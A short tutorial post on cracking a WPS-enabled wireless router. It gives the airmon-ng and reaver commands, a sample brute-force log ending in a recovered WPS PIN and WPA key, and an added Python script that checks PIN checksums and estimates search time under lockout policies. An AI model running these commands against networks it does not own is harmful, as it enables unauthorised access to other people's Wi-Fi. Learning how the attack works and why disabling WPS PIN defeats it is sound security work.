Cracking a WPS Wireless Network

This is the way I tested the security of a wireless network with WPS enabled.

Put your wireless card into monitor mode:

$ sudo airmon-ng start wlan0

Run the ‘reaver’ program to crack the WPS PIN:

$ sudo reaver -i mon0 -b 00:11:22:33:44:55 -vv

Replace 00:11:22:33:44:55 with the BSSID of the wireless router (the one with WPS enabled).

You should see these messages:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 1
[+] Associated with 00:11:22:33:44:55 (ESSID: WPS-ROUTER)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK

Many hours later (more than 10h in my case):

[+] Pin cracked in 38417 seconds
[+] WPS PIN: '77805034'
[+] WPA PSK: '6C0D5A37E7B0A30C'
[+] AP SSID: 'WPS-ROUTER'
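
Why the run above finishes in hours, and what an AP-side lockout changes: this is an added example, not part of the original post or of reaver. It checks the PINs printed in the log against the WPS checksum rule and bounds the search time; the per-attempt time and the lockout policies are assumed values.

```python
# Added example, not from the original post.

def wps_checksum(body7: int) -> int:
    """Check digit for the first 7 PIN digits (weights 3,1,3,... from the right)."""
    accum, weight = 0, 3
    while body7:
        accum += weight * (body7 % 10)
        weight = 4 - weight          # alternate 3, 1
        body7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit matches the checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


# The AP rejects a wrong first half right after M4 (the NACKs in the log),
# so the halves are searched one after the other, not multiplied together.
FIRST_HALF = 10 ** 4                 # digits 1-4
SECOND_HALF = 10 ** 3                # digits 5-7; digit 8 is derived
MAX_ATTEMPTS = FIRST_HALF + SECOND_HALF


def worst_case_hours(sec_per_attempt, lock_after=None, lock_seconds=0):
    """Upper bound on exhausting the PIN space.

    lock_after / lock_seconds model a hypothetical AP policy that pauses
    WPS for lock_seconds after every lock_after failed attempts.
    """
    total = MAX_ATTEMPTS * sec_per_attempt
    if lock_after:
        total += (MAX_ATTEMPTS // lock_after) * lock_seconds
    return total / 3600


if __name__ == "__main__":
    for pin in ["12345670", "00005678", "01235678", "11115670", "77805034"]:
        print(pin, "checksum ok" if is_valid_pin(pin) else "checksum bad")
    rate = 3.5                       # assumed seconds per attempt
    print(f"no lockout:        {worst_case_hours(rate):.1f} h")
    print(f"60 s per 3 fails:  {worst_case_hours(rate, 3, 60):.1f} h")
    print(f"1 h per 10 fails:  {worst_case_hours(rate, 10, 3600):.1f} h")
```

Every PIN in the log passes the checksum, which is why only 11000 candidates exist instead of 10^8. Disabling WPS PIN on the router removes this search space entirely.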
